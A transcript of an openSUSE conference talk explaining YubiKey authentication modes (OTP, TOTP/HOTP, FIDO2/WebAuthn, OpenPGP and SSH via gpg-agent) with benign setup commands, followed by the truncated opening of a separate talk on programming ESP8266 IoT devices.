The agenda for today is something like this: I will talk about authentication in general, and I will tell you why we actually need something beyond a password, because passwords have certain problems, and what kinds of things can happen. Then I will go quickly through the modes that the YubiKey supports; there are different modes, and we will talk about some of them on a high level. There's a workshop scheduled for tomorrow where we can go into all the details of how to actually set this up, but today it's really about, from a user's point of view, how am I supposed to use this thing, not the configuration details. I also plan for some demo time and Q&A at the end.

In case you want to read up on this, here are some links. For users, the most interesting is probably the website of Yubico, the vendor of the YubiKeys; they have a lot of resources and explain in great detail what kinds of products they have and how the different modes actually work. There's also the dongleauth.info site, where you can find out which service providers currently support which kinds of tokens, so you can find out where you can actually use them, and there's another page, twofactorauth.org, which does similar things. If you are a developer and want to find out more about how to develop applications and enable them for this kind of stuff, I would recommend those resources as well.

So, some authentication basics. Basically everybody is doing it every day: the moment you see a person and recognize them, you're basically confirming that, yes, this is the person I know. With computers it's already a bit more difficult, because anybody can sit in front of a computer and claim to be someone else. So, abstractly speaking, authentication is just the confirmation of an identity, or the process of confirming an identity. That's the formal definition, but it's very easy to understand, and in our context, when we are speaking about user authentication, we are answering the question: who am I speaking with?

Whenever you speak about authentication, there's also the term authorization, and obviously there's a difference between the two. Authentication is the answer to the question "who am I?", and these are some of the variations of the term that are used when referring to authentication.
With authorization we are answering the question: what am I allowed to do? The two are highly coupled most of the time, because in order to authorize something we first need to know who we are speaking to, but technically they are different things, and there are different protocols for the different aspects of this.

When we're talking about authentication, there are three kinds of things we can use to authenticate someone. There is something you are, that is biometric attributes like fingerprints, face recognition, voice recognition, iris scans and the like, which you probably already know from your smartphone and its fingerprint sensor. Then there's something you know, which is basically passwords, PINs and other kinds of secrets. And there can be something you have, something you carry along, like a physical key with which you can open a door, some sort of hardware token, or a smartphone; in our case it's the YubiKey, and this is the category of something that you have. You can combine those different kinds of things when you're authenticating someone, and you end up with two-factor authentication, for instance, which of course you have all heard of by now, and which in general is a very good approach to authentication.

Whenever you're dealing with authentication, you always have to balance three aspects: there's the security aspect, which is probably what most security engineers look at, but at least as important are usability and deployability, so is it actually usable by normal people, and what are the costs of using and operating this stuff? A YubiKey, for instance, is about 50 dollars, so compared to a password there is a cost for people. There are a lot of authentication protocols, these are just some of them, and they address different problems and put their emphasis on different points, but in the end there are a lot of options; there is not one really perfect solution, there is always some sort of trade-off.

So what's actually wrong with passwords? There's a lot that's good about them: they're easy to use, easy to implement, very universal, you can use them everywhere, in the end it's only a string comparison, and we even have recommendations and best practices, from NIST for instance, telling us how long a password is supposed to be, which character classes it should contain, and so on. On the other hand, passwords are also challenging, and it's something you hear about all the time: people use weak passwords, they reuse the same passwords, they get phished or enter the password in a place where they are not supposed to enter it. And on the other end, the people who store our passwords get breached all the time and use wrong practices: they hash them wrongly or not at all, they don't salt them, stuff like this. Passwords are also very difficult to handle, because obviously we're humans and cannot remember a lot of random characters, so we need password managers or some other scheme, which makes them cumbersome and also no fun to enter: if you have a lot of special characters with different keyboard layouts and so on, it's not a lot of fun to type them, especially if you have to do it often.
Also, even if you have very strong passwords, they do not protect against a lot of attacks that are being carried out in the real world all the time: once someone knows a password, however they found it out, they can reuse it as often as they like, that's the replay problem; it can be phished; there can be man-in-the-middle attacks, and so on. And the reality is basically a mixture of all of what I've just said: daily breaches with billions of passwords, passwords lying around somewhere on the internet and the dark web, and wrong understandings. For years and years NIST was recommending that you reset your password every 90 days, and basically everybody is doing this because it's also implemented in Active Directory and the like, and even the guy who came up with it at some point said: hey, I'm sorry, this was totally wrong and it doesn't make a difference. But we're still stuck with it, so even among the experts there is some misunderstanding. And people always argue: hey, you just need to train people and educate them about it. But there are papers from the 70s and 80s saying that people are using weak passwords, and after 40 or 45 years of education, "123456" and "password" were still the most used passwords in 2017, for instance.

So one way to improve on this is to use hardware. Here you see a bunch of different hardware: you can see YubiKeys, which this talk is about, but there is also a whole bunch of other keys and hardware doing very similar things, and with U2F and WebAuthn there are open standards which are cross-compatible, so you can actually use any of those keys for that particular purpose. Hardware like this is also used in many other applications, not only for user authentication on a computer: in your car there is some secret cryptography going on, there are online transactions, and so on. And before the YubiKeys became famous we already used a lot of hardware: there were those hardware tokens that you had to physically carry along, where you could press a button or they would change the code every 30 seconds, like the RSA token or something like that, and you had to manually enter this code, a one-time password basically, next to your password. The YubiKeys do something very similar. There are also smart cards, which can do a lot more than just one-time passwords; they can be used to hold certificates and things like that.

In the end, the basic idea behind all of this is that we have a secure environment where we can do cryptography: the keys used in there cannot be accessed easily, or hopefully at all, and the processor in these tokens cannot run arbitrary commands; it's very locked down, you cannot update it, for instance. The goal is basically to make it difficult to hack and clone those devices, the interfaces are kept simple, and there is not a lot of interaction you can do with them.
This is the picture you saw in the beginning, and a lot of this is not specific to YubiKeys. They are very intuitive to use: the only interaction a YubiKey allows is basically to touch it, and there is a short and a long press. You can either touch it for, I think, less than half a second, which is the short option, or press it longer and it will use a different slot, but that's basically it. It's also very easy to explain, to your parents for instance: it is very similar to a physical key. You have to carry it along, and when you forget it at home you cannot get in; but the nice thing is that it cannot be easily cloned, and somebody has to physically steal it if they want to impersonate you, so it requires physical possession. The different models have different interfaces: USB is probably the easiest one to use, but there is also NFC included on some of them, which is mostly important for mobile platforms.

The YubiKeys in general, all of them, support several different modes, and this allows different use cases. It's not only the one-time password thing I was talking about: there is also a WebAuthn / FIDO2 component for web authentication, which I will tell you a bit more about; there is an OpenPGP applet, so you can use it as a smart card for GPG; you can use it for static passwords, so you can program a very complex password into it and whenever you press the button it just spits out that complex password; and there is also a more advanced applet called PIV, where you can actually manage identities and certificates, so it can simply pretend to be a smart card. With big enterprises, in the past, you would usually get such a smart card and have to plug it into your computer, and it would do some authentication; the YubiKey can do the same things, but in a much smaller and nicer form factor. As you can see, there are a lot of different applications in there and a lot of different configuration options, so this is actually quite a complex device, but for users it's very easy to deal with.

So, let's start with one-time passwords; we already talked about them with the older hardware tokens. The basic idea behind one-time passwords is that you have a password that is only very short-lived: it can be used only once, or for a short period of time, and it is used as an additional factor, so you have to provide your actual password and then you are also asked for a one-time password. There are a lot of different ways to do this, and different vendors and service providers choose different routes: there are hardware tokens, like the RSA one I was talking about; you can have applications on your smartphone; you can use smart cards; you can get a TAN list, which is a little different but pretty much the same idea; you can get it via SMS or text message; some providers will send you an email whenever you try to log in; you can get printed lists of one-time passwords; and of course you can use the YubiKey, which actually supports several modes for one-time passwords.
The first one is the Yubico OTP, and this is basically what Yubico started with: back in 2007 or so they created this little device, and it would just spit out seemingly random characters whenever you press it. The idea is that it is a USB device emulating a keyboard, so you don't need any driver support or anything; it just types some letters whenever you press the button, and the service provider, when receiving this string of characters, can then verify the one-time password. It looks something like this: if you press it multiple times, it spits out random-looking characters. They don't mean anything to us, but actually this is encoded information. Yubico refers to this encoding as modhex; it's a little more involved because they want to make sure it works on all platforms and keyboard layouts, so they can only use certain key codes and not all characters, but in the end there is information in there. What this information contains is, on the one hand, a specific ID for this YubiKey, so the prefix, the first characters, are a YubiKey ID, and the rest is the actual one-time password, which is encrypted with a key that only the validating party, in this case Yubico, knows. As a service provider you can ask Yubico: you send this one-time password to a Yubico server, they have the key that is burned into your YubiKey, and they can verify it. There is also a counter in there for replay protection.

The nice thing about this is that it comes pre-configured: you buy the thing from Amazon, put it into your USB slot, and it just works. It is based on a shared secret, and there is a third party involved, which is Yubico. You can host the validation server yourself, but that is a little more complicated and most people choose not to do so, so there is a trust relationship with Yubico: Yubico is doing the verification for you, so you end up trusting them. It also scales very well for users, because you can use it with any service provider that supports it, and there is nothing you need to configure; you just press the button. In openSUSE it works out of the box, because it's just a USB HID device. There is an application called YubiKey Manager that you can use to manage some aspects of it and to swap the slots, for instance, so you can choose whether this is on the short or the long press. And you can also use this with a PAM module called pam_yubico for local authentication: to log into the system you not only have to provide a password, but also plug in the right YubiKey. The drawbacks are, unfortunately, that not a lot of service providers have picked up on this, there is only a limited number of them, and it requires network connectivity: the service provider needs a connection to Yubico in order to verify the one-time password, and if something breaks in between, authentication breaks, which is an important property of the system to keep in mind.
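To make the structure of such a Yubico OTP a bit more tangible: the emitted string is 44 modhex characters, where the first 12 are the public ID of the key and the remaining 32 are the encrypted one-time part. The example string below is made up, not a real OTP.

```bash
# Made-up example OTP in modhex; a real one comes straight from the key press.
otp="cccccclvbtngjnhrhjukjnuvjdluvvjdbhghrublvelk"
echo "public id     : ${otp:0:12}"   # identifies which YubiKey this is
echo "encrypted part: ${otp:12}"     # only the validation server can decrypt and check this
```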
There are other kinds of one-time passwords, which you are probably more familiar with. They are usually referred to as OATH, an open alliance for authentication that standardized these one-time passwords, and there are two kinds in this category: time-based, which is TOTP, and event-based, which is HOTP, so you can basically choose what you want here. Both have advantages and disadvantages. On the YubiKey, the event-based one, HOTP, works just like before: you press the button and it spits out the code. For the time-based one we need an additional application, because the YubiKey itself does not have a clock, so you need support from the host system, which provides the time to the YubiKey. You usually end up with a six-digit code; if you are familiar with the Yubico Authenticator or FreeOTP or something like that, the standard is the same, so all of them will generate the same codes. You can then enter those codes manually, or let the YubiKey type them for you.

This is also based on a shared secret, but this time there is no network connectivity required, because the shared secret is on the YubiKey and the service provider has it too, so you don't need a third party. It does require some initial configuration, though: before you can use it with a service provider, you have to set it up and share the secret. That is easy for us to do, but not for everyone else. Also, you can only use these one-time passwords as an additional factor, because all you have is the six-digit code and you don't know who it belongs to, so before you can verify it, the user has to provide their username and usually the password as well. You can use it as a second factor, but if someone just gives you this code, you don't know who it is; with the Yubico OTP from before, as I said, there is a prefix which tells you which user it is. But here there is no third party anymore.

You can also use it in openSUSE, it is supported out of the box, but as I said it requires some initial configuration. The service provider will give you the secret, usually via a QR code that you scan with an authenticator app, for example, but the information encoded in that QR code is something you can also burn into the YubiKey. Once again, with the YubiKey Manager you can configure all of this, and with a PAM module you can also use it for local authentication against the system. Here you don't need any internet or network connectivity, so you can use this basically offline. The drawbacks are the setup: as I said, it's very easy for us to do, you copy-paste a string into the application and the application burns it into the YubiKey, but for other target audiences this might not work out. And it also scales very badly: I don't want to share the same secret with different service providers, so I would need a separate shared secret for every service provider, and unfortunately the YubiKey only has two slots, so I can use one YubiKey with at most two service providers. You can imagine that this doesn't work out on the internet, where you have hundreds of accounts.
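The six-digit OATH codes described above can also be generated on any machine with oath-toolkit, which is a handy way to see that a YubiKey, FreeOTP and the command line all follow the same standard. The base32 secret here is a made-up example, not a real one.

```bash
# Time-based (TOTP) code from a made-up base32 secret:
oathtool --base32 --totp "JBSWY3DPEHPK3PXP"
# Event-based (HOTP) code for counter value 5 from the same secret:
oathtool --base32 --counter=5 "JBSWY3DPEHPK3PXP"
```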
On top of that, and this applies to all one-time passwords in general, there is a bunch of problems. They do increase security quite a bit, because simply knowing the password is no longer enough, and they also have a cool touch to them; it feels like launching rockets, where you have to look up some code or something. But they also don't solve a lot of problems, because in the end what happens in reality is that people don't only enter their password into the wrong web page; if they fall for that, they will also enter the one-time password, and then it can be misused. Sessions, like browser sessions, can still be hijacked if someone gets hold of the cookie. And in the end it is also based on shared secrets, so the service provider has to store the secret somewhere, and if it leaks it can be misused. So all of this is not ideal. The most important thing is that it scales very badly: as I said, you would basically need dozens of YubiKeys if you wanted to do it right, so you just cannot consider it done right.

What's more interesting, where they tried to do it right, is the FIDO family: U2F and WebAuthn. Historically speaking, U2F came first and the others evolved out of it, and these use public-key cryptography. Now it begins to get interesting, because we will have different keys for different service providers, and not the same shared secret everywhere. This scales very well for users: you can use the same key with a whole bunch of service providers, and that's not a problem at all. It is built for web authentication, so it's difficult, or at least not straightforward, to use it for anything other than web authentication, and the ambition, at least, is to get rid of passwords altogether. You have probably also heard this passwordless buzzword: with FIDO2 there are several modes where you don't need any password at all, only the key.

The basic idea with all of these, because I won't have time to go into every detail, is that you have an authenticator, which is the YubiKey in our case but could also be implemented in software, and you have a supporting browser, and the browser talks to the service provider on the one end and to the authenticator on the other end, kind of relaying messages between the two parties.
U2F was developed starting in 2012; the technically correct term is FIDO U2F, because it was donated to the FIDO Alliance. Out of all of this came WebAuthn, which, in layman's terms, is a modularization of U2F: one aspect, the communication between the browser and the server, is WebAuthn, and then there is the client-to-authenticator protocol, the communication between the browser and the authenticator. It was basically split up, and all of this together is referred to as FIDO2. Here I am going to use the terms more or less synonymously, because we don't have time to go into the details and it's a little more complicated than this. With all of them you have this terminology: there is the server, which is referred to as the relying party; it generates and delivers some JavaScript code, this JavaScript code is then executed by the browser, and it will basically tell the browser: hey, get in touch with the authenticator. The authenticator is just an abstract model; it can be implemented in many different ways, but the most straightforward and one of the most secure ways to do it is a YubiKey. It can also be done in software, possibly using a TPM module to make it a little more secure, but we are focusing on the hardware tokens here.

Basically there are only two kinds of ceremonies. Before you can use this with a service provider, you have to register: somewhere, once you are logged in (with your password, these days), you go into the options and tell them, hey, I want to register a token, and the browser will then ask you to insert your token and press the button. The second ceremony is the authentication: here you have already registered the key, so the service provider already has the public key, and you then sign a challenge, that's what is going on behind the scenes, in order to authenticate. This is the more complete, technical overview of what is going on, with some of the JavaScript API and the arguments it takes, but that is only interesting for developers. For users the experience is really easy: you surf the web just as you are used to, and at some point, when the browser asks you to touch the button on the key, you do so. There is basically nothing for you to do besides sticking in the YubiKey and touching the button.

All of this already works in openSUSE, and it works with any modern browser, Firefox, Chrome and so on. In Firefox there is one configuration option you might have to enable; I'm not sure what the default is by now. About a year ago it was not enabled by default, but as far as I remember they wanted to enable it at some point. And with the YubiKey Manager you can only turn this mode on or off; you cannot do any more than that.
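If you want to poke at the FIDO side of a key from the command line, the libfido2 package ships a small utility for it. A quick sketch; the exact output and option set depend on your libfido2 version, and the device path in the comment is only an example:

```bash
fido2-token -L                  # list connected FIDO/U2F authenticators and their device paths
# fido2-token -I /dev/hidraw0   # show the capabilities of one device (example path)
```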
Then there is the list of browsers that support this; for us it's Chrome and Firefox. The nice thing about this, and this was the innovative part back then, is that there is an integrated key-handling scheme. With public-key cryptography you always have key pairs, and you don't want to reuse the same key pair everywhere, because then you're back to the same problem; if you use different key pairs, you are not traceable. It's a little more complicated than this, but it uses elliptic-curve cryptography, so pretty much any random bit pattern can be used as a key. What's going on, on a high level, is that you take a device secret and the URL of the website, hash them together, and that is your private key; from it you derive the public key, which you send to the service provider. The YubiKey is not actually saving any of those keys, it can simply regenerate them whenever it needs to, so there isn't a lot of storage on those YubiKeys, because cryptographically secure storage is expensive. That's the nice aspect: it scales well without requiring a lot of storage. This is what's going on cryptographically, but once again, the interesting thing is that it takes the URL into account, plus a device-specific secret which is different for every device, so every YubiKey uses a different secret and will therefore generate different private and public keys. The web browser sits in the middle, relaying messages between the YubiKey and the web service at the other end.

Because the URL is baked into the scheme, there is phishing protection built in: if the website changes, if somebody fiddles with the URL and replaces a zero with an O or something like that, which is going on, and people fall for it, it will no longer work, because the hash will be different, even though it looks very similar to the human eye. It also scales very well, because nothing has to be stored: you just press the button and in the background the magic happens, with individual key pairs for each service. And because we have those individual key pairs, we are also not traceable: even if I use the same key with different service providers, somebody looking at all of this cannot tell that it's the same YubiKey. Another nice aspect is that the service provider only holds public keys, which on their own are kind of useless; you cannot derive anything from them.

And then there is another mode; we're basically switching topics again, and I have to go through this quickly, I'm sorry. There's the OpenPGP smart card that you can use. OpenPGP most of you probably already know: it's mostly used for email encryption and also for package signing. When you download packages with zypper, there is OpenPGP working behind the scenes, verifying the integrity of the packages. You can use the YubiKey for this kind of thing: you can put your keys on the YubiKey and then use it for encryption, so in order to decrypt an email you have to plug the YubiKey into the computer, and only then can the email be decrypted. That's already nice, but what's even nicer is that you can use GnuPG as an SSH agent, and then you can use the YubiKey for SSH authentication: you put an SSH authentication key on the YubiKey, and it can be used for SSH authentication. All of this is also supported out of the box in openSUSE; you only need the gpg2 package, which is probably installed by default. It requires some special setup: you need to use GnuPG's agent as your SSH agent and set a couple of environment variables, but you only need to do this once, and afterwards you can just use your ssh command as you are used to, log into systems, and it will actually use the YubiKey.
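One common way to do that one-time setup looks roughly like this; the server name is of course a placeholder, and the authentication key is assumed to already live on the card's OpenPGP applet:

```bash
# Tell gpg-agent to also act as an SSH agent (one-time):
echo "enable-ssh-support" >> ~/.gnupg/gpg-agent.conf
gpgconf --kill gpg-agent                                   # restart the agent

# Point SSH at the gpg-agent socket (put this in your shell profile):
export SSH_AUTH_SOCK=$(gpgconf --list-dirs agent-ssh-socket)

gpg --card-status      # the YubiKey's OpenPGP applet should show up
ssh-add -L             # the authentication key stored on the card is listed
ssh user@server        # plain ssh now asks the YubiKey (and its PIN) to authenticate
```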
The nice thing about this is that your keys are once again stored in hardware, and the smart card part of the YubiKey is protected by a PIN: whenever you use it, you have to unlock it with the PIN. If you lose it, it normally cannot be used by someone else, because after three failed attempts it blocks itself and can only be unlocked with the admin PIN, and if that is entered wrongly three times as well, it blocks completely and you cannot really use it anymore. So it is more secure than just putting your keys on a hard drive and hoping that nobody will ever access them; even if a key is encrypted on the hard drive, once it is copied it can be attacked from then on.

And there are actually many other use cases; these were probably the easiest ones to use. There is the whole PIV aspect, but that is more or less only interesting for enterprises, and it's a little more complicated to roll out and manage. Then there is a challenge-response mode, which can be used with password managers, for instance, because the shared-secret approach does not really work well there. You can use it for static passwords, telling the YubiKey to just spit out a static, not random, password, which can be very complicated so that you don't have to type it manually. And you can also use it via Bluetooth and NFC on mobile platforms with Android.

If you want to know more details: as I said, tomorrow there is a workshop where the idea is to set up all of the things I was talking about here, and there are also a lot of resources on the internet. The Yubico developer site is a really great portal and goes into every mode in detail if you're interested in more, and it's good to read up on FIDO2 and WebAuthn, because I stayed very high-level here and actually simplified things to a degree that is kind of wrong; I gave a separate talk about the mechanics of it which goes into some of the details.

So, in summary: passwords by themselves are kind of insecure, YubiKeys are very easy to use and increase security, so everybody should use them. The support in openSUSE is quite good, so there's no reason not to use them. And now we come to the practical part of this, the demo. So, I'm still here, and I have a YubiKey with me. Yubico has a bunch of different demonstration sites, and the easiest one to use is the Yubico OTP one, the first mode I was talking about. Here I just press the button and it enters those characters; to the browser they don't mean anything, but the service provider can actually decode them, the counters and the other information in there, and can use that to tell that it's the right user, if the user has the right YubiKey.
So that is one thing you can use. The more interesting one is the FIDO demo, U2F and WebAuthn, which comes next. As I said, with FIDO there are basically these two steps. In the first step we have to register a YubiKey with the service provider; we have to tell them about it. This is only a simple demo use case, so there's not a lot of fancy other authentication going on, but essentially there's a button, my browser is executing JavaScript here, and this dialog is coming from the browser. It's asking me, telling me: hey, this website wants to use the authenticator, do you agree? I can press continue here. Because I simplified so much earlier: there is an option to stay anonymous, or to also send along an attestation certificate, which would tell the service provider what kind of key I have and which could in turn be used to track me, so I can choose whether to do that or not. And now I'm asked by the browser to put my finger on the YubiKey. It's also blinking, but you can't see that from back there, and I just press the button now. Once again, there is a lot of stuff going on, and you can check it here: this is all the information that is exchanged between the browser, the YubiKey and the service provider. You need to understand something about cryptography to make sense of it, but essentially all of this is sufficient to authenticate. So I think this is very easy: you don't have to understand all the technical stuff, you basically only press the button.

Once I have registered my YubiKey there is even more information I can check out here, but the second step is to actually authenticate myself. I have now registered this device with the service provider, the service provider knows about it, so the next time I come along I will authenticate. Once again, this is only a demo, so I have to press the next button here, and it basically looks for the device; now I'm not even asked whether I want to stay anonymous anymore, I'm just shown this dialog, I press the button, and I'm successfully authenticated. This is way easier to use than any password, and it's also way more secure, so this is very nice.

And one more thing, one more demonstration. Basically I have a bunch of files lying around here, SSH private and public keys, and you probably all know how to use them to authenticate against a server: you can pass the -i option on the command line, or set up your SSH configuration to use them. What's more advanced is to use the SSH agent. There is this ssh-agent, which also comes with the OpenSSH package, and if you do something like this, I now have an agent running, and you can talk to this agent with the ssh-add command and add those identities to it. So what you could basically do is take a key from the hard drive, add it to the agent, and then it can be reused without you having to decrypt it every time; this is more convenient. But what's even more secure is to use GnuPG as the SSH agent: you basically get rid of all of this and, with my setup here, you set this one variable in a specific way, and in the end you're talking to the GnuPG agent instead of the SSH agent.
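For reference, the plain ssh-agent steps at the start of this demo boil down to the following; the key filename is a placeholder. The gpg-agent variant that the demo switches to was sketched earlier, after the OpenPGP section.

```bash
eval "$(ssh-agent)"          # start an agent and export SSH_AUTH_SOCK / SSH_AGENT_PID
ssh-add ~/.ssh/id_ed25519    # add a key from disk; the passphrase is asked for once
ssh-add -l                   # list the identities the agent now holds
```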
GPG agent instead of the SSH agent, and here you can see the card number, this is my SSH key line around the new key, and now I can use this key just again, the other key I will install it on the server, I can use it for authentication, and when I unplug the new key, for instance, I don't see any method, it is only from, this is basically more secure than having keys that were on directory. And then it does pretty much it, and the place where I can open up for questions and answers. Yes, go ahead. What, how exactly does it make more secure to the build up passwords? The problem is in fact that I know something, it is more secure to use the new key than the password. So it is a bit difficult, but I would argue for most people it will be more secure to use the new key than the password, because people have proved over and over again that they are not able to use passwords currently. And also, the last validations for the entropy of passwords, which can be deployed. So I assume you know a lot about passwords, you are using random passwords for a lot of entropy, but still there is something, and then some of the answers you compute are basically somehow gets to know what passwords, he can use them. He can use them as often as he wants them to, so this is not true of the new key. The new key needs to be physically stored in there. I think most people know way better how to secure physical stuff than to secure some information on some random key. So that's the main argument. Passwords can be secure to some extent, but most people there are just proven by reality. I thought that you said that question. Can I add the password security for the new key? Yeah, so this was basically kind of the simplification of it. With U2F you would not. So this was basically the first step of this, but now with U2F5 and with I2 there is a pin, just like any other smartwatch, and you can lock your new key basically, and if you do it wrongly, too often, you really won't get stuck there. So that's most unresentable question. Yes? Is it possible to replace secrets on the hardware? It depends to which module you're referring to, so to this U2F web of N and 5.2.9, that's why I don't know. This is really drawn into this thing. And with the other stuff, with the one-time password, you can set that for yourself and... The service provider will tell you that. But how can you... There's not a copy at Ubico... It's the one thing you have trust Ubico. But you can just put your own... I'm not sure, so as far as I know, it's not possible. Yes? What do you do to reduce it? We have a problem, and the answer... Basically, the file 2 answer is to have multiple keys registered with service provider. So you can actually... Everywhere I register it, you have some in the menu, you can also... You can register multiple ones. But of course, it's inconvenient. I also dislike this aspect of this phone. Okay, okay. Could you put your own secret onto the device and could have a paper copy somewhere in your safe? Yeah. I don't think this was... Any other? It seems like it's very much vendor-locked in because of this dominant position of Ubico in the center. So is there any chance that this system can be federated in some sort? I wouldn't argue that this is vendor-locked because there's a lot of other vendors also. It's an open standard that everybody can implement. So that's a question. You just make sure it's from the standard. Like it's described as much as I was able to make my own Ubico company. 
And I was not locked in by the fact that the most service providers would need to have this third party contact with me, which they wouldn't do because they say 90% of the users are already in Ubico. So it's like I could of course not have a Gmail account, but it's quite hard to have my own SMTP for live descending stuff. So there is sort of a vendor-locked even though SMTP is an open standard in the sense that there is no inaccessible documentary on how to implement it. Still, I'm locked into certain bigger providers. What is your take on that? How it is positioned in Ubico? It also depends kind of the more when we're talking about FIDU2, then there was this question if I want to stay anonymous or not. If I choose to stay anonymous, the service provider doesn't even know what kind of device I am in. They will just be sending a public key and they don't know it's a unique key if it's done in software or if I have something else. I think Google has the title key which is basically they decide for whatever reason they don't trust Ubico or they don't want to partner with them anymore so they are building the company. If you choose to send along this, what happens in the background is you send along a certificate specific to this device and it is signed by Ubico basically. The service provider could technically say hey, I'm only allowing devices from Ubico. So far I haven't seen anyone doing this. I'm technically a good person. Question answered? Sort of. I have to give you some thought to... I can't conceive of this. Let's discuss afterwards. Any other questions? That's it from my side. Thank you.
YubiKeys are handy little USB tokens that allow for hardware-based cryptography, which are becoming ever more prevalent. They provide support for a great variety of cryptographic protocols and standards, and offer several modes of operations. While this makes them very versatile, it can also be somewhat confusing, especially when you are only getting in touch with them for the first time. This talk is an introduction to YubiKeys. It will explain what multifactor authentication is about, what kind of problems the YubiKey is addressing, and how the different modes of operation can be used to improve computer security. In this talk two new emerging authentication standards will also be touched upon, namely WebAuthn and FIDO2. These are related to the YubiKey and in combination will make authentication throughout the Internet substantially more secure. More importantly, however, it is very easy to use - even by non-technical people! A live demonstration will show you how a typical workflow looks like. Some advice and good practice, along with a Q&A session will conclude the talk. Recently some effort has been put into packaging and updating the software stack for YubiKeys within openSUSE, so that everything (including the latest generation of YubiKeys) are supported out-of-the box. For this talk no prior knowledge about the topic is required and/or expected. Any cryptographic concepts that are needed for explanation will be introduced on a high-level during the talk. Having basic cryptographic knowledge will definitely make it easier to follow along on some details, though.
10.5446/54410 (DOI)
Okay, so welcome to this talk about IoT programming with openSuser. My name is Klaus Kempf. I'm a Senior Product Owner currently working for the CASP offering, the container as a service platform. But today, let's look at what is IoT? Why is IoT important to everyone? And since you're all hackers, I'd like to show you a couple of IoT devices and especially how to program them with openSuser. What about me? I'm meanwhile an openSuser veteran 20 years already. Active and open source for quite some time. Google knows it all. Privately, I'm a father, a hacker and a maker. I love agile and, as I said, taking care of containers. But IoT. So who knows what IoT is? Who has heard about IoT? So not everyone raised his hand. So IoT is the Internet of Things. That means that everything one day would get an IP address. Maybe these chairs will get an IP address, maybe the projector already has one, and they all communicate and interact. Why is it important? Because there's a lot of money behind. Simple as that. If everywhere there's some computer or device which has a CPU and some means of transferring in information. It is also important to all of us in terms of security and to understand what this actually means. Let me start with a couple of IoT device examples. Many of you know this. That's actually not the latest version. Newer versions have wireless, but that's not what I'm going to talk about here. Because these things are pretty trivial in the sense of you can put Linux on them and treat it as a normal device. What I'm going to talk about is these things. And I have one here. So the little blue thing which almost can't see. This is an IoT device. The cables and the other thing is just a serial connector, a serial to USB. The IoT device is here. I have a couple of other examples. So for example, this one, again here, this is the actual CPU and wireless controller. And this is just a serial converter. This one is quite popular. As you can see, it has a lot of eye opens. And all these examples are dead cheap. A couple of euros. So what is inside? Usually they are called ESP8266. There's a successor that is called ESP32, which I don't have with me this time. They all do wireless, normal wireless. They have a risk processor and limited, very limited amount of RAM and flash. But they are cheap and for a specific purpose, they are wonderful. So what are typical characteristics of IoT devices which I think are important? First of all, these devices are constrained. You cannot run Linux on them. They are small in terms of memory. They are small in terms of CPU power. They have usually a handful, maybe two handful of pins to interact with the outside world. Almost all of them run on low power, so not the typical USB 5V but 3.3V. Some of them have analog input, so you can have analog to digital converter. Typical use cases for these are temperature sensors. Many of them have an I2C bus. This is just a three-wire bus for a lot of other things, sensors, displays, and so on. All of them appear to your device as a serial port. And of course, they all have networking capabilities so that they can interact with the Internet. Let's look at networking, IoT networking. This is the whole purpose of these things, that they can, via the Internet, connect to the world or can be reached from the outside. One example, and I have a couple of devices with me, is of course wireless LAN. It's simple. Everyone in the room here probably has a device which does wireless. The cost for these devices is small. 
Everyone has a router. We have one, I think, here which provides wireless in this room. So this is everywhere. And usage cost is also very, very low. So this is positive because here or at home, you usually have a flat rate and so on. Availability is also quite good. I mean, everyone who has a smartphone, smartphones today depend on wireless. They don't work without wireless. So everyone who has a smartphone has a wireless endpoint to connect to and there an IoT device can connect to. Range is limited, maybe 50 to 100 meter. Speed is quite good usually. But power consumption is not so good. So running such a device on a battery doesn't last long. They drain a lot of power. So you need for wireless, you need a power outlet and a power transformer. Then there is BLE, that is Bluetooth Low Energy, that is relatively new. I think it appeared a couple of years ago. Use of use is not as simple as wireless from my perspective. These IoT devices still cost more than wireless devices. Which cost is the same? If you have a Bluetooth endpoint to connect to, then it's simple. But they are not as available. So for example, in this room, there is no Bluetooth endpoint to connect to. Range is also very limited, usually less than a meter. Speed is not so very good, but power consumption is really, really low. So running these devices on a battery is easy. Then that is relatively new. This is GSM, so the mobile network to have IoT devices which connect to the mobile network is of use. So easy device cost is compared to the simple wireless devices relatively high. Usage cost is also high because you need the SIM card, you need a mobile contract and you pay per megabyte. So you can't stream on these devices without paying a lot of money. Availability is very good. I mean, mobile coverage worldwide is okay. Speed is also quite high, but power consumption, no. Again, those need a lot of power. And the last, and I think there's a talk about this in parallel, is Laura Van, the long-range wide area network. That is something pretty new. These are views is quite okay because again, it's like the Internet. Problem is device cost. Those devices are still relatively expensive and especially the endpoints are expensive. But the nice thing about Laura Van is Laura Van, especially in Europe here, is growing in the sense of that people provide free endpoints. So cost, usage cost is extremely low because you can connect to Laura Van endpoint and from there, you have free traffic. Availability is not very good, but it's getting better. I think here in Nuremberg, we currently have three or four endpoints. So I, for example, I'm active in the Nuremberg maker space, the FabLab Nuremberg, and we are currently in the process of establishing Laura Van endpoint and provide Internet through this. Range is extremely good. Several key kilometers, if there is especially line of sight. Read is very, very low. But that's the purpose. Purpose is not to transfer pictures, but the purpose here is to transport sensor readings like temperature, humidity, movement or so, and power consumption is very, very good. So I don't have one of these devices myself, but what I heard, you can run these devices for weeks on a battery because they don't have a constant connection. They just turn on their transmission when needed. Okay. And all these Internet of Things, it is about sensors. This is what these devices are for. And here is a typical example of these are the sets you can get on eBay, for example. 
And for example, this one here is soil moisture. So you can check if your plants have enough water. There is a Hall's sensor touch. This is ultrasound for proximity. There are light sensors and so on. And such a set costs, I think, 20 euros or so just to tinker with. So with a sensor and a simple wireless IoT, you are in the 20, 30 euros range. But you need to program these things. So what do we have there? There is a very simple programming model, and this is kind of a very rough one, but it should transport my point. So you have a, of course, you have a CPU core. On top of this, you have a boot loader so that when the device starts, that it knows what to do. And on top of this, you have the firmware, that is, so to speak, the application, the base application, and then you have your application. So this is the programming, the runtime environment, and this is your application. Usually you can't change the boot loader, but what you can do is you can change the firmware. This is possible everywhere, and then you can have different applications. So let's look at firmwares. If you buy these ESP things, then they typically are pre-programmed with the expressive AT firmware. So an AT firmware does a modem emulation. So who of you is old enough that he knows about modems and the AT command set? This is pretty old. These are the things that you connected to your landline. And I think it was Hayes, a manufacturer who standardized this command set. So if you plug these devices in, they appear as a serial device, and what you need is a terminal program which talks to your serial device and opens to the rescue. There are even two of them. It is Minicom and Picocom. This is what opens to the provides, and how it looks like is something like this. So you have every command starts with AT. And then, for example, AT plus GMR shows you the version. And then you have AT plus CW LAP does a scan of available endpoints. And if you download the presentation, you will probably see more of it. And then you will see this is an actual screenshot from the openSUSA summit in Nashville where I tried this out. But you can change the firmware. And for example, the one very popular is MicroPyton. Yes, you can 